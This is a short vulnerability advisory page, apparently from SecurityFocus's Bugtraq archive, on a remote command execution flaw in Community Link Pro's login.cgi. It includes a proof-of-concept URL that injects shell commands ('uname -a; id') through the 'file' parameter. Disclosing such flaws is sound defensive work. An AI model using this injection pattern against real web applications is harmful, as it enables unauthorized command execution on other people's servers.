Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Community Link Pro Login.CGI File Parameter Remote Command Execution Vulnerability

An exploit is not required.

The following proof of concept is available:

http://www.example.com/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|







 

Privacy Statement
Copyright 2009, SecurityFocus